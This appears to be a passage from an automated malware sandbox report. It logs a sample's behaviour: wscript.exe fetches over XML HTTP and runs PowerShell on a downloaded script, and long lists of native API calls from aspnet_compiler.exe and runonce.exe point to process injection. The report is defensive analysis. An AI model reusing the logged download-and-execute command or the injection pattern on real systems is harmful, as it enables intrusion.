                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0042CAA3 NtClose,4_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F635C0 NtCreateMutant,LdrInitializeThunk,4_2_00F635C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62B60 NtClose,LdrInitializeThunk,4_2_00F62B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00F62C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00F62DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F63090 NtSetValueKey,4_2_00F63090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F63010 NtOpenDirectoryObject,4_2_00F63010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F64340 NtSetContextThread,4_2_00F64340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F64650 NtSuspendThread,4_2_00F64650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F639B0 NtGetContextThread,4_2_00F639B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62AF0 NtWriteFile,4_2_00F62AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62AD0 NtReadFile,4_2_00F62AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62AB0 NtWaitForSingleObject,4_2_00F62AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62BF0 NtAllocateVirtualMemory,4_2_00F62BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62BE0 NtQueryValueKey,4_2_00F62BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62BA0 NtEnumerateValueKey,4_2_00F62BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62B80 NtQueryInformationFile,4_2_00F62B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62CF0 NtOpenProcess,4_2_00F62CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62CC0 NtQueryVirtualMemory,4_2_00F62CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62CA0 NtQueryInformationToken,4_2_00F62CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62C60 NtCreateKey,4_2_00F62C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62C00 NtQueryInformationProcess,4_2_00F62C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62DD0 NtDelayExecution,4_2_00F62DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62DB0 NtEnumerateKey,4_2_00F62DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F63D70 NtOpenThread,4_2_00F63D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62D30 NtUnmapViewOfSection,4_2_00F62D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62D10 NtMapViewOfSection,4_2_00F62D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F63D10 NtOpenProcessToken,4_2_00F63D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62D00 NtSetInformationFile,4_2_00F62D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62EE0 NtQueueApcThread,4_2_00F62EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62EA0 NtAdjustPrivilegesToken,4_2_00F62EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62E80 NtReadVirtualMemory,4_2_00F62E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62E30 NtWriteVirtualMemory,4_2_00F62E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62FE0 NtCreateFile,4_2_00F62FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62FB0 NtResumeThread,4_2_00F62FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62FA0 NtQuerySection,4_2_00F62FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62F90 NtProtectVirtualMemory,4_2_00F62F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62F60 NtCreateProcessEx,4_2_00F62F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F62F30 NtCreateSection,4_2_00F62F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A35C0 NtCreateMutant,LdrInitializeThunk,9_2_045A35C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A4650 NtSuspendThread,LdrInitializeThunk,9_2_045A4650
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A4340 NtSetContextThread,LdrInitializeThunk,9_2_045A4340
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_045A2C70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2C60 NtCreateKey,LdrInitializeThunk,9_2_045A2C60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_045A2CA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_045A2D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_045A2D30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2DD0 NtDelayExecution,LdrInitializeThunk,9_2_045A2DD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_045A2DF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_045A2EE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_045A2E80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2F30 NtCreateSection,LdrInitializeThunk,9_2_045A2F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2FE0 NtCreateFile,LdrInitializeThunk,9_2_045A2FE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2FB0 NtResumeThread,LdrInitializeThunk,9_2_045A2FB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A39B0 NtGetContextThread,LdrInitializeThunk,9_2_045A39B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2AD0 NtReadFile,LdrInitializeThunk,9_2_045A2AD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2AF0 NtWriteFile,LdrInitializeThunk,9_2_045A2AF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2B60 NtClose,LdrInitializeThunk,9_2_045A2B60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_045A2BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_045A2BE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_045A2BA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A3010 NtOpenDirectoryObject,9_2_045A3010
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A3090 NtSetValueKey,9_2_045A3090
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2C00 NtQueryInformationProcess,9_2_045A2C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2CC0 NtQueryVirtualMemory,9_2_045A2CC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2CF0 NtOpenProcess,9_2_045A2CF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A3D70 NtOpenThread,9_2_045A3D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A3D10 NtOpenProcessToken,9_2_045A3D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2D00 NtSetInformationFile,9_2_045A2D00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2DB0 NtEnumerateKey,9_2_045A2DB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2E30 NtWriteVirtualMemory,9_2_045A2E30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2EA0 NtAdjustPrivilegesToken,9_2_045A2EA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2F60 NtCreateProcessEx,9_2_045A2F60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2F90 NtProtectVirtualMemory,9_2_045A2F90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2FA0 NtQuerySection,9_2_045A2FA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2AB0 NtWaitForSingleObject,9_2_045A2AB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A2B80 NtQueryInformationFile,9_2_045A2B80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02629680 NtReadFile,9_2_02629680
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02629780 NtDeleteFile,9_2_02629780
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02629510 NtCreateFile,9_2_02629510
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02629820 NtClose,9_2_02629820
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02629980 NtAllocateVirtualMemory,9_2_02629980
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0441F2CF NtReadVirtualMemory,9_2_0441F2CF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0441F8C4 NtMapViewOfSection,9_2_0441F8C4
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 3_2_011B0D613_2_011B0D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004188F34_2_004188F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004030004_2_00403000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004100CA4_2_004100CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0042F0D34_2_0042F0D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004100D34_2_004100D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004012404_2_00401240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E2E34_2_0040E2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004102F34_2_004102F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00416AFE4_2_00416AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00416B034_2_00416B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004024624_2_00402462
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004024704_2_00402470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E47C4_2_0040E47C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E4274_2_0040E427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040E4334_2_0040E433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004027504_2_00402750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE70E94_2_00FE70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEF0E04_2_00FEF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FDF0CC4_2_00FDF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C04_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE81CC4_2_00FE81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3B1B04_2_00F3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF01AA4_2_00FF01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F1724_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FFB16B4_2_00FFB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F6516C4_2_00F6516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FCA1184_2_00FCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F201004_2_00F20100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4D2F04_2_00F4D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD12ED4_2_00FD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4B2C04_2_00F4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F352A04_2_00F352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD02744_2_00FD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3E3F04_2_00F3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF03E64_2_00FF03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F7739A4_2_00F7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEA3524_2_00FEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1D34C4_2_00F1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE132D4_2_00FE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FDE4F64_2_00FDE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F214604_2_00F21460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE24464_2_00FE2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEF43F4_2_00FEF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FCD5B04_2_00FCD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF05914_2_00FF0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE75714_2_00FE7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F305354_2_00F30535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4C6E04_2_00F4C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE16CC4_2_00FE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F2C7C04_2_00F2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEF7B04_2_00FEF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F307704_2_00F30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F547504_2_00F54750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F5E8F04_2_00F5E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F338E04_2_00F338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F168B84_2_00F168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F328404_2_00F32840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3A8404_2_00F3A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D8004_2_00F9D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F329A04_2_00F329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FFA9A64_2_00FFA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F469624_2_00F46962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F399504_2_00F39950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4B9504_2_00F4B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FDDAC64_2_00FDDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FCDAAC4_2_00FCDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F75AA04_2_00F75AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F2EA804_2_00F2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA3A6C4_2_00FA3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEFA494_2_00FEFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE7A464_2_00FE7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F6DBF94_2_00F6DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE6BD74_2_00FE6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF9B804_2_00EF9B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4FB804_2_00F4FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEFB764_2_00FEFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEAB404_2_00FEAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F20CF24_2_00F20CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEFCF24_2_00FEFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD0CB54_2_00FD0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA9C324_2_00FA9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F30C004_2_00F30C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F2ADE04_2_00F2ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4FDC04_2_00F4FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F48DBF4_2_00F48DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE7D734_2_00FE7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE1D5A4_2_00FE1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F33D404_2_00F33D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3AD004_2_00F3AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEEEDB4_2_00FEEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F39EB04_2_00F39EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F42E904_2_00F42E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FECE934_2_00FECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F30E594_2_00F30E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEEE264_2_00FEEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F22FC84_2_00F22FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF3FD54_2_00EF3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00EF3FD24_2_00EF3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEFFB14_2_00FEFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31F924_2_00F31F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA4F404_2_00FA4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F50F304_2_00F50F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F72F284_2_00F72F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FEFF094_2_00FEFF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046224469_2_04622446
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045614609_2_04561460
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462F43F9_2_0462F43F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0461E4F69_2_0461E4F6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046275719_2_04627571
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045705359_2_04570535
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0460D5B09_2_0460D5B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046305919_2_04630591
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046216CC9_2_046216CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458C6E09_2_0458C6E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045947509_2_04594750
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045707709_2_04570770
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0456C7C09_2_0456C7C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462F7B09_2_0462F7B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462F0E09_2_0462F0E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046270E99_2_046270E9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045770C09_2_045770C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0461F0CC9_2_0461F0CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0463B16B9_2_0463B16B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0455F1729_2_0455F172
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045A516C9_2_045A516C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045601009_2_04560100
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0460A1189_2_0460A118
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046281CC9_2_046281CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046301AA9_2_046301AA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0457B1B09_2_0457B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046102749_2_04610274
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046112ED9_2_046112ED
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458B2C09_2_0458B2C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458D2F09_2_0458D2F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045752A09_2_045752A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0455D34C9_2_0455D34C
